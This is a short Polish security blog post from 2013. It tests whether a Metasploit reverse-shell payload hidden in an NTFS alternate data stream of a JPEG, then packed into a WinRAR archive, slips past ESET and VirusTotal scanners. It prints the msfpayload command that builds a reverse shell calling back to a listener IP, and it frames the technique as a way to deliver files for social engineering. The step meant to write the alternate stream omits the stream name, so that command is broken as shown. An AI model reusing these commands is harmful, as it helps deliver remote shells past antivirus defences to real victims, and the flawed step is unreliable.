ADS - chowanie plików w archiwum

ADS – chowanie plików w archiwum

data: 5 sierpnia, 2013
czas czytania: 2 min
autor: Jacek Sowiński

Na ostatnim spotkaniu naszej grupy eksperckiej, nasz kolega Michał opowiadał o ciekawych rzeczach związanych z Social Engineeringiem. Wywiązała się też dyskusja na temat tego, czy w ADS moglibyśmy chować coś, co zostanie potem wysłane.

Poniżej mały reasearch na ten temat – próba ukrycia meterpretera wewnątrz obrazka. Research mały – tylko na przykładzie standardowanego Meterpretera, bez żadnych encoderów i tylko dla ESETa 32. Tak więc, zależnie od tego co potrzebujemy i chcemy zrobić, rezultaty mogą być różne.

Najpierw generujemy payload meterpretera:
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > 1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"172.16.104.130", "LPORT"=>"31337"}

Na próbę zrobienia czegokolwiek z tym plikiem ESET reaguje czerwoną gorączką – i bardzo słusznie.

jsowinski

Virus total: 34/46. Zaskakująco mało.

Teraz próba ukrycia pliku w ADSie. Wybieramy sobie obrazek (copyright Kona) i kopiujemy do niego nasz payload:

type 1.exe > cinder_kone2.jpeg

Taki plik ESET także wykrywa jako szkodliwy (jak widać skanuje ADSa):

jsowinski2

Teraz wracamy do problemu – czy da się ukryć ADS w archiwum. Po szybkim googlaniu okazuje się, że WinRAR obsługuje ADS w archiwach (ale tylko z nieszyfrowanych filesystemów) – trzeba zaznaczyć opcję „Save File Streams”:

jsowinski3

Taki RAR nie jest już wykrywany przez ESET-a jako zagrożenie. Czyżby PROFIT?

Nie do końca, bo przy rozpakowywaniu takigo archiwum ESET już reaguje, więc wiele nie zyskaliśmy 🙂

Co nam to daje – w praktyce pewnie niewiele (sporo ograniczeń: tylko WinRAR, brak możliwości rozpakowania na maszynie z antywirem) ale kiedyś może się przydać do przesłania pliku.

No i na koniec VirusTotal dla testowego pliku 16/46 – jak widać nie wszystkie antywirusy dały się oszukać:

jsowinski4

Newsletter

Zainteresowały Cię nasze treści?
Sprawdź co jeszcze przygotowaliśmy.

Adres e-mail

Dziękujemy! Na Twój adres e-mail wysłaliśmy prośbę o potwierdzenie zapisu do newslettera.

O nie! Coś poszło nie tak. Nie zapisałeś się.

Gdyby tylko dało się zapisać Twojego maila dwa razy :)

Niepoprawny mail. Spróbuj jeszcze raz.

Cookies

W pracy serwujemy suchar dnia. Tutaj musimy Cię poczęstować ciasteczkami. Dowiedz się więcej.